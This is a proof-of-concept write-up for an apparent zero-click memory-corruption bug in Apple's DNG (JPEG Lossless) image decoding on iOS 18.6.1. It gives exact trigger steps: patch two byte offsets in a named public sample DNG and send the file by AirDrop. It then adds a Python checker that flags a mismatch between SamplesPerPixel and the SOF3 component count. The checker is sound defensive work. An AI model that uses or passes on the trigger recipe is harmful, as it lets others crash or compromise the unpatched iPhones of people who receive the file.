# iOS 18.6.1 0-click RCE POC
The vulnerability seems to be in Apple's implementation of the JPEG Lossless decompression code that is used for Adobe's DNG file format. I modified `SamplesPerPixel` in the `SubIFD` directory of a DNG to reach the vulnerable function and decreased the `component` count of the `SOF3` block to trigger what seems like an out-of-bounds write.
`RawCamera.bundle`, where all of the vulnerable code lies, seems to be stripped of symbols, so the code path is hard to explain; I leave that for the reader to figure out. Not all DNG files that use JPEG Lossless compression seem to reach this vulnerable path: I used Adobe's official `Adobe DNG Converter` tool and also `dnglab` to export DNG files with this compression type but never reached this code path until the very specific sample DNG linked below. This POC doesn't crash iOS 18.6.2, so I assume it's the same bug :P
## Reproduction steps:
1. Download https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/1638788346
2. Modify the following bytes:
```
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
```
3. Airdrop etc
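As an added defender-side check that is not part of this PoC (nor Apple's or Adobe's code): a small Python script that walks IFD0 and the first `SubIFD` of a DNG and flags any lossless-JPEG strip whose `SOF3` component count disagrees with `SamplesPerPixel`, which is the inconsistency the byte patches above introduce. The tag numbers are the standard TIFF/DNG ones; the file it builds for its own test is a constructed minimal TIFF, not the linked sample DNG.

```python
import struct
TAG_COMPRESSION, TAG_STRIPS, TAG_SPP, TAG_SUBIFD = 0x103, 0x111, 0x115, 0x14A   # standard TIFF/DNG tags
FMT = {1: "B", 3: "H", 4: "I"}                                                  # TIFF BYTE / SHORT / LONG

def read_ifd(buf, off, e):
    """Return {tag: first value} for the BYTE/SHORT/LONG entries of the IFD at off (e = endian prefix)."""
    ents = {}
    for i in range(struct.unpack_from(e + "H", buf, off)[0]):
        tag, typ, cnt, raw = struct.unpack_from(e + "HHI4s", buf, off + 2 + 12 * i)
        if typ in FMT:  # values wider than 4 bytes live at the offset stored in the entry
            src = raw if struct.calcsize(FMT[typ]) * cnt <= 4 else buf[struct.unpack_from(e + "I", raw)[0]:]
            ents[tag] = struct.unpack_from(e + FMT[typ], src)[0]
    return ents

def sof3_components(buf, off):
    """Walk JPEG markers from off and return Nf from the SOF3 (FFC3) header, or None if absent."""
    p = off + 2 if buf[off:off + 2] == b"\xff\xd8" else len(buf)
    while p + 4 <= len(buf) and buf[p] == 0xFF and buf[p + 1] not in (0xDA, 0xD9):
        if buf[p + 1] == 0xC3:
            return buf[p + 9]  # SOF3 segment: Lf(2) P(1) Y(2) X(2) Nf(1) ...
        p += 2 + struct.unpack_from(">H", buf, p + 2)[0]
    return None

def find_mismatches(buf):
    """(ifd_offset, SamplesPerPixel, Nf) for every lossless-JPEG (Compression=7) IFD where they disagree."""
    e = "<" if buf[:2] == b"II" else ">"
    off0 = struct.unpack_from(e + "I", buf, 4)[0]
    ifd0 = read_ifd(buf, off0, e)
    ifds = [(off0, ifd0)]
    if TAG_SUBIFD in ifd0:  # only the first SubIFD is followed here
        ifds.append((ifd0[TAG_SUBIFD], read_ifd(buf, ifd0[TAG_SUBIFD], e)))
    out = []
    for off, ifd in ifds:
        if ifd.get(TAG_COMPRESSION) == 7 and TAG_STRIPS in ifd:
            nf, spp = sof3_components(buf, ifd[TAG_STRIPS]), ifd.get(TAG_SPP, 1)
            if nf is not None and nf != spp:
                out.append((off, spp, nf))
    return out

def sample_dng(spp, nf):
    """Constructed little-endian TIFF: IFD0 -> SubIFD -> minimal JPEG carrying only a SOF3 header (not a real image)."""
    def ifd(entries):  # entries: (tag, type, count, value) with every value fitting in the 4-byte field
        body = b"".join(struct.pack("<HHII", *ent) for ent in entries)
        return struct.pack("<H", len(entries)) + body + b"\0\0\0\0"
    sub_off, jpeg_off = 8 + 18, 8 + 18 + 42  # IFD size = 2 + 12*n + 4
    ifd0 = ifd([(TAG_SUBIFD, 4, 1, sub_off)])
    sub = ifd([(TAG_COMPRESSION, 3, 1, 7), (TAG_STRIPS, 4, 1, jpeg_off), (TAG_SPP, 3, 1, spp)])
    comps = b"".join(bytes([i + 1, 0x11, 0]) for i in range(nf))  # Ci, Hi/Vi, Tq per component
    jpeg = b"\xff\xd8\xff\xc3" + struct.pack(">HBHHB", 8 + 3 * nf, 16, 1, 1, nf) + comps + b"\xff\xd9"
    return b"II*\0" + struct.pack("<I", 8) + ifd0 + sub + jpeg
```

To scan a real file, call `find_mismatches(open(path, "rb").read())`; files with several SubIFDs or several strips are only partially covered by this check.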